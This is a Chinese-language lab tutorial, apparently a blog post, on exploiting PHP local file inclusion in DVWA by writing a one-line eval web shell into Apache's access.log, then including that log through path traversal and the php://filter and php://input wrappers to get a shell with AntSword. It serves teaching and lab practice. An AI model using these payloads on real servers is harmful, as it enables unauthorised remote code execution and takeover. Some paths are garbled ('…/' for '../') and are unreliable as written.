中间件日志包含绕过
前言
一、什么是中间件日志包含绕过
当某个PHP文件只存在本地包含漏洞,不存在远程包含漏洞,而却无法上传正常文件(无上传功能),这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。
Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中
例如:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=…/…/…/…/Apache-20\logs\access.log
使用的是DVWA环境 安全等级低
首先要把一句话木马写入到access.log访问日志中
直接在URL中加入一句话木马,回车,虽然会报错,但是没关系,我们的一句话木马已经被access文件记录了 之后只需要利用本地包含文件来运行access.log就可以了
注意要用…/来调整目录
二、中间件日志包含漏洞获取shell
1.中间件日志包含
我们在dvwa进行实验
将安全级别调为最低级
点击文件包含进行实验,复制网址
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=include.php
当我们无法上传文件的时候,可以注入一句话木马,回溯到日志那里去获取shell
http://192.168.222.4/dvwa/<?php @eval($_POST['chopper']); ?>
http://192.168.222.4/dvwa%3C?php%20@eval($_POST[%27chopper%27]);%20?%3E
2.利用Apache日志获取shell
我们找到日志路径
D:\phpStudy\Apache\logs\access.log
清空日志文件后
打开注入的网址
http://192.168.222.4/dvwa/<?php @eval($_POST['chopper']); ?>
注入报错,正常,日志已经包含了一句话木马,这时我们主要回到日志目录下利用就可以了
我们修改一下后面文件
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=include.php
回到apache目录,就是phpstudy的目录
回溯四级目录
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=…/…/…/…/Apache/logs/access.log
复制到蚁剑连接
连接成功,获取shell成功。
这里补充一下php文件读写包含的内容
这里需要大家搭建好dvwa,将安全等级设为低级才行,我这里改不了,出现了一点问题,就不进行实验了,在以下目录下放入muma.php文件
D:\phpStudy\WWW\dvwa\vulnerabilities\fi
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=muma.php(读)
连接蚁剑获取shell
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=php://input(写)
<?php @eval($_POST['chopper']); ?>(一句话木马)需要利用burp抓包重发
只有在allow_url_include为on时才可以使用,查看回显结果那必须在php\php-5.4.45找到ini文件
查找display_funtions=proc-open,oppen,exec,system…删掉ssytem重启apache
利用成功后,输入代码
这是成功的实例,扫描出了端口信息,大家可以尝试一下哦。
总结
本次实提供了一种上传不了文件,通过注入一句话木马,回到apache日志中包含进行绕过的方法。